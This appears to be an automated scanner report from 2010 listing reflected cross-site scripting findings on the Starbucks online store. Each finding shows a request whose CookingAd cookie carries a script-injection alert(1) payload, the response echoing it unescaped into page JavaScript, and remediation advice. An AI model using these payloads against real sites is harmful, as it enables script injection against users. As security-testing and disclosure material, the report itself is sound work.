GET /Tours/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6eafb</script><script>alert(1)</script>892117031bf;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16822 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:58 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... e="Starbucks Tours Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Tours Page" var s_prop3="SBPTPAHP1SHTB6EAFB</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>892117031BF" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-tours/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaig ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ee24</script><script>alert(1)</script>86a7be884f9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6ee24</script><script>alert(1)</script>86a7be884f9;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29740 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:50 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <title>Coffee at Starbucks Store</title> <meta name="description" content="Shop for Coffee at Starbucks Store"> <meta name="keywords" content="Coffee, Sta ...[SNIP]... s_pageName="Coffee HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Coffee HomePage" var s_prop3="SBPTPAHP1SHTB6EE24</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>86A7BE884F9" var s_prop4="" var s_prop5="" var s_prop6="/coffee/default.asp?CCAID=SBPTPAHP1SHCO&Redir=/coffee/" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea760</script><script>alert(1)</script>6b70b264755 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBea760</script><script>alert(1)</script>6b70b264755;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29705 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:52 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <title>Coffee at Starbucks Store</title> <meta name="description" content="Shop for Coffee at Starbucks Store"> <meta name="keywords" content="Coffee, Sta ...[SNIP]... s_pageName="Coffee HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Coffee HomePage" var s_prop3="SBPTPAHP1SHTBEA760</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6B70B264755" var s_prop4="" var s_prop5="" var s_prop6="/coffee/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_sta ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c32</script><script>alert(1)</script>953da364365 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee-machines HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB76c32</script><script>alert(1)</script>953da364365;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21134 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:59 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... eName="Equipment Homepage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Equipment Homepage" var s_prop3="SBPTPAHP1SHTB76C32</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>953DA364365" var s_prop4="" var s_prop5="" var s_prop6="/coffee-machines/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da449</script><script>alert(1)</script>9e10653ba75 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee-machines/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBda449</script><script>alert(1)</script>9e10653ba75;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21134 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:23 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... eName="Equipment Homepage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Equipment Homepage" var s_prop3="SBPTPAHP1SHTBDA449</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9E10653BA75" var s_prop4="" var s_prop5="" var s_prop6="/coffee-machines/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8163c</script><script>alert(1)</script>ec3893ac889 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8163c</script><script>alert(1)</script>ec3893ac889;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:50 GMT
Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB8163C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>EC3893AC889" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdb1e</script><script>alert(1)</script>221b4ee20e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entertainment HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBcdb1e</script><script>alert(1)</script>221b4ee20e3;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" conte ...[SNIP]... rbucks Entertainment" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Entertainment" var s_prop3="SBPTPAHP1SHTBCDB1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>221B4EE20E3" var s_prop4="" var s_prop5="" var s_prop6="/entertainment/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 687ff</script><script>alert(1)</script>a3b2dc7f084 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /entertainment/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB687ff</script><script>alert(1)</script>a3b2dc7f084;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16383
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:12 GMT
Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" conte ...[SNIP]... rbucks Entertainment" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Entertainment" var s_prop3="SBPTPAHP1SHTB687FF</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A3B2DC7F084" var s_prop4="" var s_prop5="" var s_prop6="/entertainment/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b33f</script><script>alert(1)</script>b422eca8919 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /extras/newsletters.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2b33f</script><script>alert(1)</script>b422eca8919;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16365
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:14 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ame="/extras/newsletters.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/extras/newsletters.asp" var s_prop3="SBPTPAHP1SHTB2B33F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B422ECA8919" var s_prop4="" var s_prop5="" var s_prop6="/extras/newsletters.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c1e</script><script>alert(1)</script>c2c9791a405 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/ga_faq_shipop.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB30c1e</script><script>alert(1)</script>c2c9791a405;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42766
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:31 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ist/ga_faq_shipop.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/ga_faq_shipop.asp" var s_prop3="SBPTPAHP1SHTB30C1E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C2C9791A405" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/ga_faq_shipop.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de33</script><script>alert(1)</script>0be688d889d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/gareturns.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1de33</script><script>alert(1)</script>0be688d889d;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15086
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:32 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... guestassist/gareturns.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/gareturns.asp" var s_prop3="SBPTPAHP1SHTB1DE33</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0BE688D889D" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/gareturns.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a945e</script><script>alert(1)</script>f60d28581e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /guestassist/shcontus.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBa945e</script><script>alert(1)</script>f60d28581e3;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20651
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:23 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... "/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTBA945E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F60D28581E3" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78a7c</script><script>alert(1)</script>702f5512ffc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12638
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=FDGBELCBEJODMBJCBCCHOEDB; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:43:09 GMT
<!--S1--><!--S0-->
<!-- Common Function include file -->
<!-- EMail include file -->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HT ...[SNIP]... st/shgaemailconfirm.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shgaemailconfirm.asp" var s_prop3="SBDIRECT78A7C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>702F5512FFC" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shgaemailconfirm.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign= ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52800</script><script>alert(1)</script>53ab4bb2221921484 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
